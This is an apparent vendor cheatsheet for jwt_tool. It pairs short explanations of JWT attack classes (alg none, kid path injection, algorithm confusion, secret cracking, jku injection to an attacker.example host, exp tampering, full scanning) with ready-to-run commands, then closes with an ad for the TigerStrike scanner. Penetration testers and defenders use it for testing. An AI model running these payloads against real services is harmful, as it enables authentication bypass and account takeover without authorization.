jwt_tool cheatsheet
The attack payloads that still work against production JWT implementations in 2026 — plus the TigerStrike scanners that catch each class before an attacker does.
none Algorithm Bypass
Many JWT libraries incorrectly accept {"alg":"none"} as a valid signature. The token is unsigned but the server trusts it anyway — classical authentication bypass.
jwt_tool -I -pc user -pv admin -S nonekid Header Injection
The kid (key ID) header tells the server which key to validate against. If the server reads kid from the token to construct a filesystem path, SQL query, or lookup — the token controls the key.
jwt_tool -I -hc kid -hv "../../../../dev/null" -S hs256 -p ""
# Alternative with injected path
jwt_tool -i -hc kid -hv "/dev/null" -s hs256 -p ""HS256 → RS256 Algorithm Confusion
The server validates the token with whatever algorithm the token header specifies. Flip RS256 to HS256 and sign with the public key as HMAC secret — server validates successfully.
# Fetch public key
curl https://target.example/.well-known/jwks.json
# Confuse the algorithm
jwt_tool -X k -pk public.pemWeak HS256 Secret Cracking
HS256 tokens are vulnerable to offline brute-force if the signing secret is weak. jwt_tool integrates dictionary cracking against the token.
jwt_tool -C -d wordlist.txtjku / x5u Header Injection
jku and x5u point to the key / certificate URL. If the server fetches whatever URL the token says, host attacker-controlled keys and the server validates against them.
jwt_tool -I -hc jku -hv "https://attacker.example/jwks.json"Expiration Bypass
Servers that ignore the exp claim, or that validate exp before signature, let old tokens live indefinitely. jwt_tool tampers with claims to test this.
jwt_tool -X i -I -pc exp -pv 9999999999Full Scanning Mode
Run jwt_tool against a target in all-attack mode — issues every attack class against the token and reports what works. The one-shot workflow for pen testing engagements.
jwt_tool -t https://target.example/api/user -rc "Cookie: jwt=<token>" -M atStop running jwt_tool manually.
TigerStrike runs every JWT attack class automatically against your production JWTs on every release, chains JWT findings into attack paths, and produces compliance-ready evidence for SOC 2, ISO 27001, and PCI DSS auditors.
See all JWT scannersStop finding vulnerabilities manually
TigerStrike uses AI agents to continuously discover, validate, and exploit vulnerabilities across your applications — so your team can focus on fixing what matters.